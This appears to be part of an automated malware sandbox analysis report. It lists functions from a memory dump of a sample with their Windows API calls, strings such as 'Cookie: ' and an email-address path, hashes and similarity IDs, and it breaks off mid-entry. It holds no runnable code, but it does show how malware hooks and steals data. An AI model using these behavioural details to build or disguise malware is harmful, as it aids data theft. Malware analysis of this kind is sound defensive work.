Opcode Fuzzy Hash: 242bbc9c6fc004e4989c3172a20734439c22878336abeae3d591165ccf78a371
Instruction Fuzzy Hash: 3071C1B1E00209AFCF00DFA5C8849EEBBB9FF48344B5495A9E516A7250DB35A981CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B14065, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00B14112
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00B14128
memset.NTDLL ref: 00B141C8
memset.NTDLL ref: 00B141D8

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 1e3d9205beddf6490f29df30116303ef7884748320a7bb65c37acdf36fd65f05
Instruction ID: 37b4f638b14c14605923db931d6b11fb107275f94173cbbf680aaebcf4816523
Opcode Fuzzy Hash: 1e3d9205beddf6490f29df30116303ef7884748320a7bb65c37acdf36fd65f05
Instruction Fuzzy Hash: 0741E431A00219ABDB10DFA8DC85BEE7BF4EF54320F5085A9F919BB181DB709E958B40

Uniqueness

Uniqueness Score: -1.00%

Function 00B35B53, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00B3839C,00B3837C,?,00000008), ref: 00B35C93

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

Part of subcall function 00B278AB: lstrlenW.KERNEL32(?,00000000,?,?,00000000,00B1FFD9,00000000), ref: 00B278BC
Part of subcall function 00B278AB: lstrlenW.KERNEL32(00B3A4C8,00000000,?,00000000,00B1FFD9,00000000), ref: 00B278D3

Strings

1.0, xrefs: 00B35B7D
A8000A, xrefs: 00B35B82
EmailAddressCollection/EmailAddress[%u]/Address, xrefs: 00B35C16

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$AllocateErrorHeapLast
String ID: 1.0$A8000A$EmailAddressCollection/EmailAddress[%u]/Address
API String ID: 3415590935-2884085418
Opcode ID: d06366dbc0b3c605d75c78592333bd4012a35029b5aaa2e143089f6260f4b530
Instruction ID: eaf1033da398c4a3aab7236180a864d8c0c9333236a05bf13004733b194d0f7f
Opcode Fuzzy Hash: d06366dbc0b3c605d75c78592333bd4012a35029b5aaa2e143089f6260f4b530
Instruction Fuzzy Hash: C341F974A00605AFCB10DFA4D889EAEB7F9EF89704F244498F905EB251DB71EE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001F6A74, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 001F6B94

Part of subcall function 001F550F: RtlAllocateHeap.NTDLL(00000000,?,001F21E6), ref: 001F551B

GetLastError.KERNEL32 ref: 001F6B08
WaitForSingleObject.KERNEL32(00000000), ref: 001F6B18
GetLastError.KERNEL32 ref: 001F6B38

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 17a4deb5fc80268f9775b385b23a14c0463e2c841758c201cdcca3a48b515553
Instruction ID: 37c7dccd9f09f812db8ad3f521f78ec2ccd406f6094b952aa5647c98caf3f412
Opcode Fuzzy Hash: 17a4deb5fc80268f9775b385b23a14c0463e2c841758c201cdcca3a48b515553
Instruction Fuzzy Hash: 044108B4A0020DEFDF10DFA4DA849BEBBB9FB44345F2044A9E602E3151D7359E81EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B21395, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B214B5

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

GetLastError.KERNEL32 ref: 00B21429
WaitForSingleObject.KERNEL32(00000000), ref: 00B21439
GetLastError.KERNEL32 ref: 00B21459

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: be428fe4069b6cc29ead95a194d2dd3df559fc4218eec4b92ffdf982bf921874
Instruction ID: 72cf8277dc6cf804bb0772b36d96ce186df9b396fffa9b79a719ae88065b5e3b
Opcode Fuzzy Hash: be428fe4069b6cc29ead95a194d2dd3df559fc4218eec4b92ffdf982bf921874
Instruction Fuzzy Hash: 4F412C70900229EFDF10EFA8E9845ADBBF9FF14340B2048A9E519E7250DB749E44DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00B118E3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B206E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B20714
Part of subcall function 00B206E2: HeapFree.KERNEL32(00000000,00000000,?,?,00B21F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 00B20739

HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1199D
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B119BD
HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00004000,00000001,00000001,?,00000000,00000000,00000000,?,?,00000000), ref: 00B119C9

Strings

https://, xrefs: 00B11913

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate
String ID: https://
API String ID: 3472947110-4275131719
Opcode ID: 9130f2123e8c73d962bb7cc783e9a60ade1b66bbcb8e45cc5db599b781793d77
Instruction ID: ff9e9fa4dbbc640033bb16f056f6e5fb1af879fcd9f6444b7e2060f31db89fd0
Opcode Fuzzy Hash: 9130f2123e8c73d962bb7cc783e9a60ade1b66bbcb8e45cc5db599b781793d77
Instruction Fuzzy Hash: D0218031401228BBCF225F65EC94EDE7FF6EF40B90F5084A5FA0866061CA718DD2DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B20BB6, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 00B20BE5
SetEvent.KERNEL32(?), ref: 00B20C2F
TlsSetValue.KERNEL32(00000001), ref: 00B20C69
TlsSetValue.KERNEL32(00000000), ref: 00B20C85

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 2c18bdad460d940846240696c45bba2bd54ffcbec2254df2043e49b228013450
Instruction ID: 44d8e51c6445e076d83685bf56c051aade43780b5461ba1e4ca43ef9b1eb8c8f
Opcode Fuzzy Hash: 2c18bdad460d940846240696c45bba2bd54ffcbec2254df2043e49b228013450
Instruction Fuzzy Hash: 5E21D3B1120214EFCB25AF15FC8896E7BE6FB40310B240A65F819DB1B1CB71EC51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CC46, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B2CC9F
memcpy.NTDLL(00000018,?,?), ref: 00B2CCC8
RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0001292A,00000000,000000FF,00000008), ref: 00B2CD07
HeapFree.KERNEL32(00000000,00000000), ref: 00B2CD1A

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: 662d558de0c48315585449bc0bcb0c21c9019c9d8c5f67fe18563684cd27e07d
Instruction ID: 46af93260d70fae2f458cec6d6fb8fe366d6c67168b1898d865a6ae728121301
Opcode Fuzzy Hash: 662d558de0c48315585449bc0bcb0c21c9019c9d8c5f67fe18563684cd27e07d
Instruction Fuzzy Hash: B8315070100619AFDB208F28EC85A9E7FE9FF04360F104539F81AD72A0DB70E915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B18BC3, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B18BE5
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 00B18C29
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00B18C6F
CloseHandle.KERNEL32(?,?,?,?,?), ref: 00B18C92

Part of subcall function 00B2EBD0: GetTickCount.KERNEL32 ref: 00B2EBE0
Part of subcall function 00B2EBD0: CreateFileW.KERNEL32(00B30C37,80000000,00000003,00B3E0D4,00000003,00000000,00000000,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EBFD
Part of subcall function 00B2EBD0: GetFileSize.KERNEL32(00B30C37,00000000,Local\,00000001,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC29
Part of subcall function 00B2EBD0: CreateFileMappingA.KERNEL32(00B30C37,00B3E0D4,00000002,00000000,00000000,00B30C37), ref: 00B2EC3D
Part of subcall function 00B2EBD0: lstrlen.KERNEL32(00B30C37,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC59
Part of subcall function 00B2EBD0: lstrcpy.KERNEL32(?,00B30C37), ref: 00B2EC69
Part of subcall function 00B2EBD0: HeapFree.KERNEL32(00000000,00B30C37,?,00B30C37,00000000,00000000,00B145A1,00000000), ref: 00B2EC84
Part of subcall function 00B2EBD0: CloseHandle.KERNEL32(00B30C37,Local\,00000001,?,00B30C37), ref: 00B2EC96

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 237834ec07ff3fda06b0659f6ef3455059b89793bd7b1f28d5c4fd1e083ba7dc
Instruction ID: dc9a5817076fed3431f163b2352e97a00851cf2890367c877af0c8c5f4a03459
Opcode Fuzzy Hash: 237834ec07ff3fda06b0659f6ef3455059b89793bd7b1f28d5c4fd1e083ba7dc
Instruction Fuzzy Hash: C2219C31540208EBDB20DFA5ED44DDE7BF8FF44314F640166F928A2161EB31C989CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B26658, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B26687
lstrlen.KERNEL32(00000000), ref: 00B26697

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

strcpy.NTDLL ref: 00B266AE
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00B266B8

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: 2b2828b9cb7bd850013c743b7447646b820eb68e36c6e974023fd5e312e79384
Instruction ID: 8506654a8cfd5ac06abff2baa6a42b58bacbce138b6a1edc5e35b97152479f55
Opcode Fuzzy Hash: 2b2828b9cb7bd850013c743b7447646b820eb68e36c6e974023fd5e312e79384
Instruction Fuzzy Hash: 0421DEB6100311AFE721AF24FC89F6A77E8EF44755F208499F95A872A1EF75D804CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00B35E4D, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(05778D20), ref: 00B35E63
RtlLeaveCriticalSection.NTDLL(05778D20), ref: 00B35E7E
GetLastError.KERNEL32 ref: 00B35EEC
GetLastError.KERNEL32 ref: 00B35EFB

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 3baeeb0d177ff7295642bfce56cb68f48fbc2e7fea117c2b102df50e5cd3fc49
Instruction ID: 618f1f881c2bcd12485d979f136d2f5fd5ffa403fbf01ffbcc60448016eab094
Opcode Fuzzy Hash: 3baeeb0d177ff7295642bfce56cb68f48fbc2e7fea117c2b102df50e5cd3fc49
Instruction Fuzzy Hash: 17213D35500A19EFCB21CF98DD44A9E7BB8FF44710F254156F915A3260DB34DA11EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B30120, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2526B: GetTickCount.KERNEL32 ref: 00B25281
Part of subcall function 00B2526B: wsprintfA.USER32 ref: 00B252C2
Part of subcall function 00B2526B: GetModuleHandleA.KERNEL32(00000000), ref: 00B252D4

GetModuleHandleA.KERNEL32(00000000,?), ref: 00B30147
GetLastError.KERNEL32 ref: 00B30161
RtlExitUserThread.NTDLL(?), ref: 00B3017B
GetLastError.KERNEL32 ref: 00B301BB

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
String ID:
API String ID: 1798890819-0
Opcode ID: 3204a11f149c67687904c7c60d47a221b59cfe384e17706b33412970197e0c70
Instruction ID: 454d7743e616ad45743a83d40e1e0b853caa174bcb8d3b92d0b560eed8d43917
Opcode Fuzzy Hash: 3204a11f149c67687904c7c60d47a221b59cfe384e17706b33412970197e0c70
Instruction Fuzzy Hash: 7D114771014744AF9710AB65AC88C7F7BBCEE86B21B640959F856D3160DF70A848CB32

Uniqueness

Uniqueness Score: -1.00%

Function 00B2F643, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B13CA4: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B2F65A), ref: 00B13CCA

CreateFileA.KERNEL32(00B2E1EA,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,00B2E1EA,00000000), ref: 00B2F695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2E1EA,4C72644C,?,00000B54), ref: 00B2F6A7
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,00B2E1EA,4C72644C,?,00000B54), ref: 00B2F6BF
CloseHandle.KERNEL32(?,?,?,?,00B2E1EA,4C72644C,?,00000B54), ref: 00B2F6DA

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 17503b857ab65e849c86772bfe19ec7b7aaf97229c460581e580c478e51be358
Instruction ID: c8f79de33f2ada2a5714905a4c46d498b13917abb25a5cec31d9b352d8ed104b
Opcode Fuzzy Hash: 17503b857ab65e849c86772bfe19ec7b7aaf97229c460581e580c478e51be358
Instruction Fuzzy Hash: 2C114F71500129BBDB21ABA5DC45EFFBEBDEF01790F104061F508E6060D7319A40DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B324E0, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(6AD68BFC,00B1619F,?,00B1619F,00000004), ref: 00B32518

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

lstrcpy.KERNEL32(00000000,6AD68BFC), ref: 00B3252F
StrChrA.SHLWAPI(00000000,0000002E,?,00B1619F,00000004), ref: 00B32538
GetModuleHandleA.KERNEL32(00000000,?,00B1619F,00000004), ref: 00B32556

Part of subcall function 00B11000: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,6AD68BFC,?,00000004,00000000,00000004,00B3D518,00000000,?), ref: 00B110D7
Part of subcall function 00B11000: VirtualProtect.KERNELBASE(00000000,00000004,00B3D518,00B3D518,?,00000004,00000000,00000004,00B3D518,00000000,?,00000000,00000002,00B3A568,0000001C,00B25176), ref: 00B110F2
Part of subcall function 00B11000: RtlEnterCriticalSection.NTDLL(00B3E240), ref: 00B11116

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 1b3f4ffd759077a8ee0b5be7f06a36a453c8b223bdd3d9b8dd90e1a69dd714aa
Instruction ID: 407f82d5fb92ea97e8c46be55d967d100e167cbe002e7a41364a3eba97351de7
Opcode Fuzzy Hash: 1b3f4ffd759077a8ee0b5be7f06a36a453c8b223bdd3d9b8dd90e1a69dd714aa
Instruction Fuzzy Hash: 7F217C70A00205EFDB14DF68C899BAEBBF9EF54300F218499E41697260DBB0EA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B22426, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B22441
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B22465
RegCloseKey.ADVAPI32(?), ref: 00B224BD

Part of subcall function 00B3247D: RtlAllocateHeap.NTDLL(00000000,00000200,00B26D11), ref: 00B32489

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 00B2248E

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 226c700f5b998c3d3e4bd99b4bd711f6680cca0a53920414eea0080b6be94dad
Instruction ID: 8ba88117c43b3441ea4e7a01ea5c0e9b5524c7cbd7b1cc1e9d48b5fd9ae62937
Opcode Fuzzy Hash: 226c700f5b998c3d3e4bd99b4bd711f6680cca0a53920414eea0080b6be94dad
Instruction Fuzzy Hash: 222108B9900118FFCB11AF99E8808EEBBF9EF44340F208096F919E6214D7719E40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001F53E6, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001F4A7F,00000000,?,00000000,001F3E0F,00000000,001FD2D4), ref: 001F53F1
RtlAllocateHeap.NTDLL(00000000,?), ref: 001F5409
memcpy.NTDLL(00000000,001FD2D4,-00000008,?,?,?,001F4A7F,00000000,?,00000000,001F3E0F,00000000,001FD2D4), ref: 001F544D
memcpy.NTDLL(00000001,001FD2D4,00000001,001F3E0F,00000000,001FD2D4), ref: 001F546E

Memory Dump Source

Source File: 00000001.00000002.860669249.00000000001F1000.00000020.00000001.sdmp, Offset: 001F1000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: a9821cf34d7c8d41686dcf94b58f825ba36ba86bfb0e9e543f0b2caddc239248
Instruction ID: 9368447293c463786b7aac55dffa1b6f248b46611dbe382be252d94ea2f4cf65
Opcode Fuzzy Hash: a9821cf34d7c8d41686dcf94b58f825ba36ba86bfb0e9e543f0b2caddc239248
Instruction Fuzzy Hash: 6D110672A00118ABC714CB69EC88DBEBBAFDB90390B140276F60497190FB709E44D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B9C6, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00B2A40B,00000000,?,?,00B34BA0,00000000,05778D60), ref: 00B2B9D1
RtlAllocateHeap.NTDLL(00000000,?), ref: 00B2B9E9
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00B2A40B,00000000,?,?,00B34BA0,00000000,05778D60), ref: 00B2BA2D
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 00B2BA4E

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: c05031acb3c93118b452ca6996d95d78e30a98d411a4a908bd17c67426ce4b0e
Instruction ID: 953f496aa519b33218dfd320c65db76c4d758ff08f1efe45ef7f397eb8c9c3d5
Opcode Fuzzy Hash: c05031acb3c93118b452ca6996d95d78e30a98d411a4a908bd17c67426ce4b0e
Instruction Fuzzy Hash: 0D110672A00224AFC7148F69EC85D9EBFEADB91360B1501B6F508D7151EE70DE04C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B225FA, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,?,7656D3B0,05778D54,?,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22620
StrTrimA.SHLWAPI(?,00B3A48C,00000000,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B2263F
StrChrA.SHLWAPI(?,?,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22650
StrTrimA.SHLWAPI(00000001,00B3A48C,?,?,00B28517,?,00000020,05778D54,?,?,00B358C6,?,?), ref: 00B22662

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 0d52d81084e8fd1fbd68f18ecb4f3c97d3f5ac77749badfe737cf3dc60adeb3d
Instruction ID: eff101f6d6796e429c776cb922065f3512a8d99a7964c7f326dad68c0673c3aa
Opcode Fuzzy Hash: 0d52d81084e8fd1fbd68f18ecb4f3c97d3f5ac77749badfe737cf3dc60adeb3d
Instruction Fuzzy Hash: 4B114F76110219BFCB119F59E884EAE7BFCEF45791F208049FC49D7211DAB5D940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B24151, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1F60A: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B1F639
Part of subcall function 00B1F60A: HeapFree.KERNEL32(00000000,00000000,?,?,00B24161,00000000,00000000,?,00000000,?,00B21FAB,?,?,?,?,?), ref: 00B1F65C

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00B21FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 00B2418B

Part of subcall function 00B314AB: lstrlen.KERNEL32(00000000,00000000,00000000,73B75520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00B314C2
Part of subcall function 00B314AB: lstrlen.KERNEL32(?), ref: 00B314CA
Part of subcall function 00B314AB: lstrlen.KERNEL32(?), ref: 00B31535
Part of subcall function 00B314AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B31560
Part of subcall function 00B314AB: memcpy.NTDLL(00000000,00000002,?), ref: 00B31571
Part of subcall function 00B314AB: memcpy.NTDLL(00000000,?,?), ref: 00B31587
Part of subcall function 00B314AB: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00B31599
Part of subcall function 00B314AB: memcpy.NTDLL(00000000,00B383E4,00000002,00000000,?,?,00000000,?,?), ref: 00B315AC
Part of subcall function 00B314AB: memcpy.NTDLL(00000000,?,00000002), ref: 00B315C1

HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00B21FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 00B241D7

Strings

https://, xrefs: 00B2419A
Cookie: , xrefs: 00B24173

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: 8726dcc93fc1b77d932781e5bfffe3256c612cbf887b8f349ef083ad4a14a790
Instruction ID: cd06214b7a13f8ccc00d84dd621f4d28967cc45e3a96d3b25bddfe8a54674528
Opcode Fuzzy Hash: 8726dcc93fc1b77d932781e5bfffe3256c612cbf887b8f349ef083ad4a14a790
Instruction Fuzzy Hash: 1901A132500229BBCB225F29EC45FAF3FE9EB95B61F148260FC08A7150CB30DD91C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B28215, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,00B3493A,00000000,00000000), ref: 00B28233
GetLastError.KERNEL32(?,00000000,?,00B3493A,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,00B2B1A8,?,0000001E), ref: 00B2823B

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 1fe726cd5272be95d9a803a100b86de31ab8782dd3e5581627201b0cefc64cbe
Instruction ID: adea3a1ec422fada0fceb03f6a6d3f8d958e71175ef2a033d0126a56676bab1e
Opcode Fuzzy Hash: 1fe726cd5272be95d9a803a100b86de31ab8782dd3e5581627201b0cefc64cbe
Instruction Fuzzy Hash: 0A01AC35145661BF96345B667C4CC1FBBECEBC6760B200B59F57DA3290CE309804C671

Uniqueness

Uniqueness Score: -1.00%

Function 00B141E7, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B141FA
lstrlen.KERNEL32(05778BC0), ref: 00B1421B
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 00B14233
lstrcpy.KERNEL32(00000000,05778BC0), ref: 00B14245

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: ec7bb526713f3c9018b143ee2335524dbf2671317dc8fe7bfc123fff26fa1a89
Instruction ID: e321a6a903684f610626bb6bd08bd38e057fb1e1db32ee4394ec8fc6297aaf96
Opcode Fuzzy Hash: ec7bb526713f3c9018b143ee2335524dbf2671317dc8fe7bfc123fff26fa1a89
Instruction Fuzzy Hash: 8A018876904344EBC7159FA9BC84E9E7BFCEB89301F2441A5F90AD3241DF309948C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B25B4A, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00B25B57
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 00B25B7D
lstrcpy.KERNEL32(00000014,?), ref: 00B25BA2
memcpy.NTDLL(?,?,?), ref: 00B25BAF

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: 1478ebce2b6c6bd4376b03bf919e0f575217b5acb8a3fa15e3549f52f9f02728
Instruction ID: 7347fd6aca610e890fa4790b6a6538e87503fe1a44ddfaeaeb4475ee4b2ee345
Opcode Fuzzy Hash: 1478ebce2b6c6bd4376b03bf919e0f575217b5acb8a3fa15e3549f52f9f02728
Instruction Fuzzy Hash: 5F11497550071AEFC721CF58E884E9A7BF8FB48704F208569F85987221DB70E904DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2CFD0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 00B2CFEC
lstrcmpi.KERNEL32(?,Main), ref: 00B2D021

Strings

Main, xrefs: 00B2D01B
Blocked, xrefs: 00B2CFE6

Memory Dump Source

Source File: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: cd084c37b74001b5e23199bb3073173616412d400b73d328f517d44b29e62336
Instruction ID: 1cf042942e5feeb9086153f5fc45fdaea137b240b43ab7f2f7625f1e65b19967
Opcode Fuzzy Hash: cd084c37b74001b5e23199bb3073173616412d400b73d328f517d44b29e62336
Instruction Fuzzy Hash: A9015E3120021AAB8B11EF25BC91CBF3BEDFB85B50B10449AFD1557162DB34DC129BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B32AED, Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON

